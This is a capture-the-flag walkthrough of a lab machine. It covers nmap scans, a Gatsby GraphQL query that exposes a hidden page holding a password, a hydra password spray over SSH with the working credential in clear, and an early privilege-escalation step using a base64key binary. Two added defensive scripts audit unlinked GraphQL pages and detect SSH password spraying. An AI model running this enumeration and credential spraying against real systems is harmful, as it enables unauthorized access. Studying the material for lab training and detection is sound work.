$ nmap -p- --min-rate 3000 192.168.183.139
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 15:03 +08
Nmap scan report for 192.168.183.139
Host is up (0.17s latency).
Not shown: 65524 closed tcp ports (conn-refused)
PORT STATE SERVICE
2500/tcp filtered rtsserv
4907/tcp filtered unknown
8080/tcp open http-proxy
18080/tcp open unknown
30330/tcp open unknown
36123/tcp open unknown
38439/tcp open unknown
42022/tcp open unknown
42086/tcp filtered unknown
50400/tcp open unknown
56339/tcp filtered unknown
Lots of ports were open, so I ran a detailed service scan (-sC -sV) against the open ones as well:
Web Enum -> GraphQL
Port 8080 shows a portfolio page:
It was rather static, so I moved to port 30330. This page had some book reviews:
This page looked more dynamic, so I ran a directory scan with feroxbuster, which found nothing of interest. Since wordlists turned up nothing, I browsed the site's own files instead:
There were a few interesting folders:
There wasn't much within the folders. On the 'Using Typescript' page, there was a link to documentation:
On the documentation page, there was mention of GraphQL being used, and sure enough /__graphql was a valid directory on the website as per the documentation:
The left-hand panel of the GraphiQL explorer already listed some valid queries, so I checked those out. Querying allSitePage reveals every page on the site, including a hidden one:
Visiting it reveals a password:
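The step above works because Gatsby's GraphiQL explorer exposes the site's whole data layer, so allSitePage lists every generated page whether or not anything links to it. As an added audit example (not code from the original writeup), this script posts that query and diffs the result against the paths a crawler or wordlist already found; the endpoint default and the sample paths are assumptions:

```python
import json
import urllib.request

# Gatsby's GraphiQL endpoint exposes the site's data layer, so a query over
# allSitePage lists every generated page, whether or not anything links to it.
# This audit helper diffs that list against what a crawler or wordlist found.
ALL_SITE_PAGE_QUERY = "{ allSitePage { nodes { path } } }"

def build_request_body() -> bytes:
    """JSON body for the GraphQL POST, the same shape the GraphiQL UI sends."""
    return json.dumps({"query": ALL_SITE_PAGE_QUERY}).encode()

def extract_paths(response_json: dict) -> list:
    """Page paths from an allSitePage response, sorted for stable output."""
    nodes = response_json.get("data", {}).get("allSitePage", {}).get("nodes", [])
    return sorted(n["path"] for n in nodes if "path" in n)

def unlinked_paths(response_json: dict, known_paths) -> list:
    """Pages present in the GraphQL layer but missing from the crawled set."""
    norm = lambda p: p.rstrip("/") or "/"   # treat /x and /x/ as the same page
    known = {norm(p) for p in known_paths}
    return [p for p in extract_paths(response_json) if norm(p) not in known]

def query_site_pages(base_url: str, endpoint: str = "/___graphql") -> dict:
    """Live query against a site you administer (not exercised offline).
    /___graphql is Gatsby's default develop-server path; assumed here."""
    req = urllib.request.Request(
        base_url.rstrip("/") + endpoint,
        data=build_request_body(),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)

# Constructed sample response in the shape Gatsby returns; the hidden path is
# made up for this example and is not the one from the writeup.
SAMPLE_RESPONSE = {"data": {"allSitePage": {"nodes": [
    {"path": "/"},
    {"path": "/using-typescript/"},
    {"path": "/404/"},
    {"path": "/example-hidden-note/"},
]}}}
SAMPLE_CRAWLED = ["/", "/using-typescript", "/404"]

if __name__ == "__main__":
    for p in unlinked_paths(SAMPLE_RESPONSE, SAMPLE_CRAWLED):
        print("only reachable via GraphQL:", p)
```

Anything the diff prints is a page that exists only because the GraphQL endpoint is reachable, which is the case for disabling or firewalling GraphiQL on anything that is not a local development build.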
This was a password to a Minecraft server. We didn't have a user, but the Minecraft page had some that we could try:
We can gather all the usernames into one wordlist:
I used hydra to brute force the creds:
We can then ssh in as marcus:
Privilege Escalation
.bash -> Base64key Root Creds
There was a weird folder .bash within the user's home directory:
This string looked like base64, but it didn't decode as plain base64. I looked at other binaries with base as part of their name:
base64key required a private key to decrypt, so I just tried the user's password and it worked:
$ sudo nmap -p 8080,18080,30330,36123,38439,42022,50400 -sC -sV --min-rate 3000 192.168.183.139
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 15:05 +08
Nmap scan report for 192.168.183.139
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
8080/tcp open http nginx 1.14.1
|_http-server-header: nginx/1.14.1
|_http-title: Identity by HTML5 UP
|_http-open-proxy: Proxy might be redirecting requests
18080/tcp open http Apache httpd 2.4.37 ((centos))
|_http-title: CentOS \xE6\x8F\x90\xE4\xBE\x9B\xE7\x9A\x84 Apache HTTP \xE6\x9C\x8D\xE5\x8A\xA1\xE5\x99\xA8\xE6\xB5\x8B\xE8\xAF\x95\xE9\xA1\xB5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
30330/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-cors: HEAD GET POST PUT DELETE PATCH
36123/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-cors: HEAD GET POST PUT DELETE PATCH
38439/tcp open unknown
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, ms-sql-s, oracle-tns:
| HTTP/1.1 400 Bad Request
|_ Connection: close
42022/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 cc2151f2c62aadd6ca0704de705ffa13 (RSA)
| 256 05e490d2002b9d14e39f4468d28ebcdc (ECDSA)
|_ 256 ca804973f0c805aebd2b42371d13e071 (ED25519)
50400/tcp open http Node.js Express framework
|_http-title: Error
|_http-cors: HEAD GET POST PUT DELETE PATCH
Minecraft: The Island by Max Brooks, #1 New York Times bestselling author of World War Z, is the first official Minecraft novel. In the tradition of iconic stories like Robinson Crusoe and Treasure Island, Minecraft: The Island will tell the story of a new hero stranded in the world of Minecraft, who must survive the harsh, unfamiliar environment and unravel the secrets of the island.
We loved this book so much that created a server. Already invited and added keralis, xisuma, zombiecleo, mumbojumbo, and waiting for a reply on the entire hermicraft clan. There is a limit on the server, but at least sabel, yvette, zahara, sybilla, marcus, tabbatha and tabby are already online and building.
Good luck everybody!
$ hydra -L users -p WallAskCharacter305 192.168.183.139 ssh -s 42022
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-12 15:20:55
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 11 tasks per 1 server, overall 11 tasks, 11 login tries (l:11/p:1), ~1 try per task
[DATA] attacking ssh://192.168.183.139:42022/
[42022][ssh] host: 192.168.183.139 login: marcus password: WallAskCharacter305
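The hydra run above sprays one password across the whole user list, and on the receiving side that leaves a burst of sshd "Failed password" lines for different users from one address. As an added detection example (not part of the original writeup), this script groups failures by source and flags a source that hits several distinct accounts within a short window; the log lines and addresses are constructed:

```python
import re
from collections import defaultdict
from datetime import datetime
# Flag a source address that fails against USER_THRESHOLD distinct usernames
# within WINDOW_SECONDS: the signature of one password tried across many accounts.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)
USER_THRESHOLD = 5
WINDOW_SECONDS = 60

def parse_failures(lines, year=2023):
    """Yield (timestamp, user, ip) for each sshd failed-password line."""
    for line in lines:
        m = FAILED_RE.match(line)
        if m:   # syslog lines carry no year, so the caller supplies it
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["user"], m["ip"]

def detect_spray(lines, year=2023):
    """Return {ip: sorted usernames} for sources that hit many accounts fast."""
    by_ip = defaultdict(list)
    for ts, user, ip in parse_failures(lines, year):
        by_ip[ip].append((ts, user))
    hits = {}
    for ip, events in by_ip.items():
        events.sort()
        for i, (start, _) in enumerate(events):   # slide a window from each failure
            users = {u for t, u in events[i:] if (t - start).total_seconds() <= WINDOW_SECONDS}
            if len(users) >= USER_THRESHOLD:
                hits[ip] = sorted(users)
                break
    return hits

# Constructed sample sshd log lines; the usernames echo the Minecraft page,
# the addresses are documentation ranges made up for this example.
SAMPLE_LOG = """\
Jul 12 15:20:55 catto sshd[2101]: Failed password for invalid user keralis from 192.0.2.10 port 50122 ssh2
Jul 12 15:20:55 catto sshd[2102]: Failed password for invalid user xisuma from 192.0.2.10 port 50124 ssh2
Jul 12 15:20:56 catto sshd[2103]: Failed password for invalid user zombiecleo from 192.0.2.10 port 50126 ssh2
Jul 12 15:20:56 catto sshd[2104]: Failed password for invalid user mumbojumbo from 192.0.2.10 port 50128 ssh2
Jul 12 15:20:57 catto sshd[2105]: Failed password for sabel from 192.0.2.10 port 50130 ssh2
Jul 12 16:02:11 catto sshd[2310]: Failed password for marcus from 192.0.2.77 port 41000 ssh2
""".splitlines()
if __name__ == "__main__":
    for ip, users in detect_spray(SAMPLE_LOG).items():
        print(f"possible password spray from {ip}: {', '.join(users)}")
```

A single wrong password from a second address is not flagged; the per-source count of distinct usernames, not the raw failure count, is what separates a spray from an ordinary typo.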
[marcus@catto ~]$ ls -la
total 20
drwx------ 5 marcus marcus 167 Nov 25 2020 .
drwxr-xr-x. 3 root root 20 Nov 25 2020 ..
-rw-r--r-- 1 root root 29 Nov 25 2020 .bash
-rw------- 1 marcus marcus 0 Apr 14 2021 .bash_history
-rw-r--r-- 1 marcus marcus 18 Nov 8 2019 .bash_logout
-rw-r--r-- 1 marcus marcus 141 Nov 8 2019 .bash_profile
-rw-r--r-- 1 marcus marcus 312 Nov 8 2019 .bashrc
drwx------ 4 marcus marcus 39 Nov 25 2020 .config
drwxr-xr-x 6 marcus marcus 328 Nov 25 2020 gatsby-blog-starter
-rw------- 1 marcus marcus 33 Jul 12 06:59 local.txt
drwxrwxr-x 4 marcus marcus 69 Nov 25 2020 .npm
[marcus@catto ~]$ cat .bash
F2jJDWaNin8pdk93RLzkdOTr60==
[marcus@catto ~]$ base
base32 base64 base64key basename